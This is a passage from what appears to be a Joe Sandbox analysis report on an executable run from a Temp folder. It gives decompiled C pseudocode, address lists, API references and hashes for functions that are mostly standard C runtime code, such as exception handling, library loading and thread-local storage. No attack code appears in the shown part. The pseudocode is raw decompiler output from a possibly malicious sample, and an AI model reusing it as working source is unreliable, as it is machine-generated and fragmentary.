								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E00401D20(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x411248;
											if(__eflags != 0) {
												_t72 = E00410990(__eflags, 0x411248);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x411248; // 0x401f30
													 *0x4111f0(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E00402380(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E004023A0(_t64, _t93, _t96, 0x418014);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E00401D20(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E00402360();
										asm("int3");
										_t66 = E004024F1();
										__eflags = _t66;
										if(_t66 != 0) {
											_t67 = E004024A3(_t86);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E0040252D();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}






























                                                              0x00401d60
                                                              0x00401d67
                                                              0x00401d6b
                                                              0x00401d6c
                                                              0x00401d72
                                                              0x00401d7e
                                                              0x00401d80
                                                              0x00401d86
                                                              0x00401d86
                                                              0x00401d8f
                                                              0x00401d91
                                                              0x00401d94
                                                              0x00401d97
                                                              0x00401d9f
                                                              0x00401da4
                                                              0x00401da7
                                                              0x00401daa
                                                              0x00401db1
                                                              0x00401e0d
                                                              0x00401e10
                                                              0x00401e18
                                                              0x00401e1f
                                                              0x00000000
                                                              0x00401e1f
                                                              0x00000000
                                                              0x00401db3
                                                              0x00401db3
                                                              0x00401db9
                                                              0x00401dbf
                                                              0x00401dc5
                                                              0x00401e30
                                                              0x00401e39
                                                              0x00401dc7
                                                              0x00401dc7
                                                              0x00401dc7
                                                              0x00401dcd
                                                              0x00401dd0
                                                              0x00401dd3
                                                              0x00401dd6
                                                              0x00401dd9
                                                              0x00401dde
                                                              0x00401df4
                                                              0x00000000
                                                              0x00401de0
                                                              0x00401de0
                                                              0x00401de2
                                                              0x00401de7
                                                              0x00401de9
                                                              0x00401dec
                                                              0x00401dee
                                                              0x00401e04
                                                              0x00401e24
                                                              0x00401e24
                                                              0x00401e28
                                                              0x00000000
                                                              0x00401df0
                                                              0x00401df0
                                                              0x00401e3a
                                                              0x00401e3d
                                                              0x00401e43
                                                              0x00401e45
                                                              0x00401e4c
                                                              0x00401e53
                                                              0x00401e58
                                                              0x00401e5b
                                                              0x00401e5d
                                                              0x00401e5f
                                                              0x00401e6c
                                                              0x00401e72
                                                              0x00401e74
                                                              0x00401e77
                                                              0x00401e77
                                                              0x00401e7a
                                                              0x00401e7a
                                                              0x00401e4c
                                                              0x00401e80
                                                              0x00401e82
                                                              0x00401e87
                                                              0x00401e8a
                                                              0x00401e8d
                                                              0x00401e95
                                                              0x00401e99
                                                              0x00401e9e
                                                              0x00401e9e
                                                              0x00401ea1
                                                              0x00401ea5
                                                              0x00401ea8
                                                              0x00401eb5
                                                              0x00401eb8
                                                              0x00401ebd
                                                              0x00401ebe
                                                              0x00401ec3
                                                              0x00401ec5
                                                              0x00401eca
                                                              0x00401ecf
                                                              0x00401ed1
                                                              0x00401edc
                                                              0x00401ed3
                                                              0x00401ed3
                                                              0x00000000
                                                              0x00401ed3
                                                              0x00401ec7
                                                              0x00401ec7
                                                              0x00401ec7
                                                              0x00401ec9
                                                              0x00401ec9
                                                              0x00401df2
                                                              0x00000000
                                                              0x00401df2
                                                              0x00401df0
                                                              0x00401dee
                                                              0x00000000
                                                              0x00401df7
                                                              0x00401df7
                                                              0x00401df9
                                                              0x00401e00
                                                              0x00000000
                                                              0x00401e02
                                                              0x00000000
                                                              0x00401e00
                                                              0x00401dc5
                                                              0x00000000

                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 00401D97
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00401D9F
                                                              • _ValidateLocalCookies.LIBCMT ref: 00401E28
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00401E53
                                                              • _ValidateLocalCookies.LIBCMT ref: 00401EA8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 5853fecd5551d68b8231a05582defb087287b744298f9fe8d297d29845485331
                                                              • Instruction ID: 6ef646e612ac45c7e77e97ed302a33c9d1442d7dd7cb3af8627288e3f0e9caaf
                                                              • Opcode Fuzzy Hash: 5853fecd5551d68b8231a05582defb087287b744298f9fe8d297d29845485331
                                                              • Instruction Fuzzy Hash: BF41B630A002089BCF10DF69C884A9EBBB5BF45318F14817AED14BB3E2D779A945CBD5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040AC14 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0040AC14(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x419230 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x412b30 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x419230 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x419230 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00406308(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00406308(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                                                              0x0040ac1d
                                                              0x0040acb2
                                                              0x0040ac25
                                                              0x0040ac27
                                                              0x0040ac31
                                                              0x0040ac36
                                                              0x0040ac43
                                                              0x0040ac58
                                                              0x0040ac5c
                                                              0x0040acc2
                                                              0x0040acc7
                                                              0x0040acce
                                                              0x0040acd2
                                                              0x0040acd5
                                                              0x0040acd5
                                                              0x0040acdb
                                                              0x0040acdb
                                                              0x0040acbd
                                                              0x0040acc1
                                                              0x0040acc1
                                                              0x0040ac5e
                                                              0x0040ac67
                                                              0x0040aca0
                                                              0x0040acad
                                                              0x0040acaf
                                                              0x0040acaf
                                                              0x00000000
                                                              0x0040acaf
                                                              0x0040ac71
                                                              0x0040ac76
                                                              0x0040ac7b
                                                              0x00000000
                                                              0x00000000
                                                              0x0040ac85
                                                              0x0040ac8a
                                                              0x0040ac8f
                                                              0x00000000
                                                              0x00000000
                                                              0x0040ac94
                                                              0x0040ac9a
                                                              0x0040ac9e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040ac9e
                                                              0x0040ac3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040ac41
                                                              0x0040acbb
                                                              0x00000000

                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,FC7B77C5,?,0040AD23,?,00000040,00000000,?), ref: 0040ACD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3664257935-537541572
                                                              • Opcode ID: 1e41e8e084f44416e7fc46dfab0bc2685af7dd9261567f4ce6f1825b991d48dc
                                                              • Instruction ID: 611442bef351d9fd720cb4668506806d26cc55d3d9c032183dd6a6f5382d3974
                                                              • Opcode Fuzzy Hash: 1e41e8e084f44416e7fc46dfab0bc2685af7dd9261567f4ce6f1825b991d48dc
                                                              • Instruction Fuzzy Hash: D021D831A04310ABEB219B21DD40AAB37689B45764F260536E906B73D0D73CED11C6EE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402411 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              C-Code - Quality: 82%
                                                              			E00402411(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x418020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E004026F4(_t13,  *0x418020);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E0040272F(_t14,  *0x418020, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E00406282();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E0040272F(_t18,  *0x418020, 0);
								} else {
									_t8 = E0040272F(_t18,  *0x418020, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E004061BE(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                                                              0x00402411
                                                              0x00402418
                                                              0x0040242b
                                                              0x00402432
                                                              0x00402434
                                                              0x00402438
                                                              0x00402451
                                                              0x00402451
                                                              0x0040243a
                                                              0x0040243c
                                                              0x0040244f
                                                              0x00402456
                                                              0x0040245f
                                                              0x00402462
                                                              0x00402465
                                                              0x00402479
                                                              0x00402479
                                                              0x00402482
                                                              0x00402467
                                                              0x0040246e
                                                              0x00402474
                                                              0x00402477
                                                              0x0040248b
                                                              0x0040248d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00402477
                                                              0x00402490
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040244f
                                                              0x0040243c
                                                              0x00402498
                                                              0x004024a2
                                                              0x0040241a
                                                              0x0040241c
                                                              0x0040241c

                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00402408,004020DC,00401948), ref: 0040241F
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040242D
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00402446
                                                              • SetLastError.KERNEL32(00000000,00402408,004020DC,00401948), ref: 00402498
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 684fce33a2afe8652c06ef2917e87edb54eca84d7017755fe4f2d0745960b01c
                                                              • Instruction ID: 8cbd38a898f6fb395fa32175277b1369e61c4e3f8d2db3b60c7e08ca7fe3f351
                                                              • Opcode Fuzzy Hash: 684fce33a2afe8652c06ef2917e87edb54eca84d7017755fe4f2d0745960b01c
                                                              • Instruction Fuzzy Hash: 770124325093226EE62467B5AE8DAAB3F56EB08378721423FF914B12F1EFF94C05514C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00408EFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00408EFC(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t15 = E00409A30(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E00408D53(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E00407B10(GetLastError());
									_t18 =  *((intOrPtr*)(E00407B6A()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E00408FBE(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00407B10(GetLastError());
						_t18 =  *((intOrPtr*)(E00407B6A()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E00408FBE(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00408FE5(_a8);
				return 0;
			}









                                                              0x00408f02
                                                              0x00408f07
                                                              0x00408f1e
                                                              0x00408f50
                                                              0x00408f5a
                                                              0x00408f73
                                                              0x00408f79
                                                              0x00408f87
                                                              0x00408f94
                                                              0x00408f9b
                                                              0x00408fb4
                                                              0x00408fb7
                                                              0x00408f9d
                                                              0x00408fa4
                                                              0x00408faf
                                                              0x00408faf
                                                              0x00408fb9
                                                              0x00408fba
                                                              0x00000000
                                                              0x00408fba
                                                              0x00408f7e
                                                              0x00408f85
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00408f85
                                                              0x00408f63
                                                              0x00408f6e
                                                              0x00000000
                                                              0x00408f6e
                                                              0x00408f20
                                                              0x00408f26
                                                              0x00408f39
                                                              0x00408f3c
                                                              0x00408f3e
                                                              0x00408f40
                                                              0x00000000
                                                              0x00408f40
                                                              0x00408f2c
                                                              0x00408f33
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00408f33
                                                              0x00408f0c
                                                              0x00000000

                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe, xrefs: 00408F18
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe
                                                              • API String ID: 0-1179249568
                                                              • Opcode ID: 638bf804aa9e11a3a9ed9b700c92c7b04de1b824e523500f8c48dab4bc0f804a
                                                              • Instruction ID: 20814d24466359e2355320ce1a3709a5b694d9d3995fe727daaa17cac18d48d2
                                                              • Opcode Fuzzy Hash: 638bf804aa9e11a3a9ed9b700c92c7b04de1b824e523500f8c48dab4bc0f804a
                                                              • Instruction Fuzzy Hash: AE218331604116AFDB10AF718A4086BB76AAF44368710853EF995B72D1EF38EC418799
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405907 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              C-Code - Quality: 25%
                                                              			E00405907(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x418014; // 0xfc7b77c5
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x410e5f, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x4111f0(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                                                              0x0040591c
                                                              0x00405927
                                                              0x0040592d
                                                              0x00405931
                                                              0x0040593c
                                                              0x00405944
                                                              0x0040594e
                                                              0x00405954
                                                              0x00405958
                                                              0x0040595f
                                                              0x00405965
                                                              0x00405965
                                                              0x00405958
                                                              0x0040596b
                                                              0x00405970
                                                              0x00405970
                                                              0x00405979
                                                              0x00405983

                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FC7B77C5,00416678,?,00000000,00410E5F,000000FF,?,004058E3,FFFFFFFE,?,004058B7,?), ref: 0040593C
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040594E
                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00410E5F,000000FF,?,004058E3,FFFFFFFE,?,004058B7,?), ref: 00405970
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: b85781b925cd3f6e4a9e5fac7271b78291b87634337c369aaa8fc80064bd98db
                                                              • Instruction ID: 0c8a8b7403f6a5ffc10fc8bc87357ce44426d05b1674744c2793e53712d4bdfd
                                                              • Opcode Fuzzy Hash: b85781b925cd3f6e4a9e5fac7271b78291b87634337c369aaa8fc80064bd98db
                                                              • Instruction Fuzzy Hash: DA01A771900619EBDB118F50DC05BEFBBB9FB08B54F004536EA11A26E0DB789900CE94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040DA04 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 58%
                                                              			E0040DA04(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				intOrPtr _t45;
				signed int _t48;
				void* _t51;
				signed int _t55;
				intOrPtr _t64;
				intOrPtr _t69;
				void* _t72;
				intOrPtr _t73;
				intOrPtr _t89;
				void* _t90;
				intOrPtr* _t92;
				void* _t94;
				intOrPtr* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t40 =  *0x418014; // 0xfc7b77c5
				_v8 = _t40 ^ _t96;
				_t89 = _a20;
				if(_t89 > 0) {
					_t69 = E0040E7A2(_a16, _t89);
					_t103 = _t69 - _t89;
					_t4 = _t69 + 1; // 0x1
					_t89 = _t4;
					if(_t103 >= 0) {
						_t89 = _t69;
					}
				}
				_t71 = _a32;
				if(_a32 == 0) {
					_t71 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t45 = E00409976(_t71, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t89, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t45;
				if(_t45 == 0) {
					L38:
					_pop(_t90);
					_pop(_t94);
					_pop(_t72);
					return E00401BE5(_t45, _t72, _v8 ^ _t96, 0x400, _t90, _t94);
				} else {
					_t16 = _t45 + _t45 + 8; // 0x8
					asm("sbb eax, eax");
					_t48 = _t45 + _t45 & _t16;
					if(_t48 == 0) {
						_t95 = 0;
						L36:
						_t73 = 0;
						L37:
						E0040A7F2(_t95);
						_t45 = _t73;
						goto L38;
					}
					if(_t48 > 0x400) {
						_t95 = E0040A6A3(_t48);
						if(_t95 == 0) {
							goto L36;
						}
						 *_t95 = 0xdddd;
						L12:
						if(_t95 == 0) {
							goto L36;
						}
						_t51 = E00409976(_t71, 1, _a16, _t89, _t95, _v12);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L36;
						}
						_t91 = _v12;
						_t73 = E0040AF6A(_a8, _a12, _t95, _v12, 0, 0, 0, 0, 0);
						if(_t73 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t30 = _t73 + _t73 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t73 + _t73 & _t30;
							if(_t55 == 0) {
								_t92 = 0;
								L34:
								E0040A7F2(_t92);
								goto L36;
							}
							if(_t55 > 0x400) {
								_t92 = E0040A6A3(_t55);
								if(_t92 == 0) {
									goto L34;
								}
								 *_t92 = 0xdddd;
								L26:
								_t92 = _t92 + 8;
								if(_t92 == 0 || E0040AF6A(_a8, _a12, _t95, _v12, _t92, _t73, 0, 0, 0) == 0) {
									goto L34;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t73);
									_push(_t92);
									_push(0);
									_push(_a32);
									_t73 = E00409A30();
									if(_t73 == 0) {
										goto L34;
									} else {
										E0040A7F2(_t92);
										goto L37;
									}
								}
							}
							E00410C20(_t55);
							_t92 = _t100;
							if(_t92 == 0) {
								goto L34;
							}
							 *_t92 = 0xcccc;
							goto L26;
						}
						_t64 = _a28;
						if(_t64 == 0) {
							goto L37;
						}
						if(_t73 > _t64) {
							goto L36;
						}
						_t73 = E0040AF6A(_a8, _a12, _t95, _t91, _a24, _t64, 0, 0, 0);
						if(_t73 != 0) {
							goto L37;
						}
						goto L36;
					}
					E00410C20(_t48);
					_t95 = _t98;
					if(_t95 == 0) {
						goto L36;
					}
					 *_t95 = 0xcccc;
					goto L12;
				}
			}




























                                                              0x0040da09
                                                              0x0040da0a
                                                              0x0040da0b
                                                              0x0040da12
                                                              0x0040da18
                                                              0x0040da1d
                                                              0x0040da23
                                                              0x0040da29
                                                              0x0040da2c
                                                              0x0040da2c
                                                              0x0040da2f
                                                              0x0040da31
                                                              0x0040da31
                                                              0x0040da2f
                                                              0x0040da33
                                                              0x0040da38
                                                              0x0040da3f
                                                              0x0040da42
                                                              0x0040da42
                                                              0x0040da5e
                                                              0x0040da63
                                                              0x0040da66
                                                              0x0040da6b
                                                              0x0040dbe1
                                                              0x0040dbe4
                                                              0x0040dbe5
                                                              0x0040dbe6
                                                              0x0040dbf2
                                                              0x0040da71
                                                              0x0040da73
                                                              0x0040da78
                                                              0x0040da7a
                                                              0x0040da7c
                                                              0x0040dbd4
                                                              0x0040dbd6
                                                              0x0040dbd6
                                                              0x0040dbd8
                                                              0x0040dbd9
                                                              0x0040dbdf
                                                              0x00000000
                                                              0x0040dbdf
                                                              0x0040da87
                                                              0x0040daa6
                                                              0x0040daab
                                                              0x00000000
                                                              0x00000000
                                                              0x0040dab1
                                                              0x0040dab7
                                                              0x0040dabc
                                                              0x00000000
                                                              0x00000000
                                                              0x0040dacd
                                                              0x0040dad2
                                                              0x0040dad7
                                                              0x00000000
                                                              0x00000000
                                                              0x0040dadd
                                                              0x0040daf4
                                                              0x0040daf8
                                                              0x00000000
                                                              0x00000000
                                                              0x0040db06
                                                              0x0040db43
                                                              0x0040db48
                                                              0x0040db4a
                                                              0x0040db4c
                                                              0x0040dbc9
                                                              0x0040dbcb
                                                              0x0040dbcc
                                                              0x00000000
                                                              0x0040dbd1
                                                              0x0040db50
                                                              0x0040db6b
                                                              0x0040db70
                                                              0x00000000
                                                              0x00000000
                                                              0x0040db72
                                                              0x0040db78
                                                              0x0040db78
                                                              0x0040db7d
                                                              0x00000000
                                                              0x0040db99
                                                              0x0040db9b
                                                              0x0040db9c
                                                              0x0040dba0
                                                              0x0040dbc1
                                                              0x0040dbc4
                                                              0x0040dba2
                                                              0x0040dba2
                                                              0x0040dba3
                                                              0x0040dba3
                                                              0x0040dba4
                                                              0x0040dba5
                                                              0x0040dba6
                                                              0x0040dba7
                                                              0x0040dbaf
                                                              0x0040dbb6
                                                              0x00000000
                                                              0x0040dbb8
                                                              0x0040dbb9
                                                              0x00000000
                                                              0x0040dbbe
                                                              0x0040dbb6
                                                              0x0040db7d
                                                              0x0040db52
                                                              0x0040db57
                                                              0x0040db5b
                                                              0x00000000
                                                              0x00000000
                                                              0x0040db5d
                                                              0x00000000
                                                              0x0040db5d
                                                              0x0040db08
                                                              0x0040db0d
                                                              0x00000000
                                                              0x00000000
                                                              0x0040db15
                                                              0x00000000
                                                              0x00000000
                                                              0x0040db31
                                                              0x0040db35
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040db3b
                                                              0x0040da89
                                                              0x0040da8e
                                                              0x0040da92
                                                              0x00000000
                                                              0x00000000
                                                              0x0040da98
                                                              0x00000000
                                                              0x0040da98

                                                              APIs
                                                              • __alloca_probe_16.LIBCMT ref: 0040DA89
                                                              • __alloca_probe_16.LIBCMT ref: 0040DB52
                                                              • __freea.LIBCMT ref: 0040DBB9
                                                                • Part of subcall function 0040A6A3: RtlAllocateHeap.NTDLL(00000000,00409475,?,?,00409475,00000220,?,00000000,?), ref: 0040A6D5
                                                              • __freea.LIBCMT ref: 0040DBCC
                                                              • __freea.LIBCMT ref: 0040DBD9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1423051803-0
                                                              • Opcode ID: 31a9e8308ad49f63b72543bf2014bf41c2de6485c2fa4ecf854cce6d76936b9c
                                                              • Instruction ID: 5d70aef8a5c4d59e68ccac4d83b3032b04bfc896b12cb9bc470d8a1540507576
                                                              • Opcode Fuzzy Hash: 31a9e8308ad49f63b72543bf2014bf41c2de6485c2fa4ecf854cce6d76936b9c
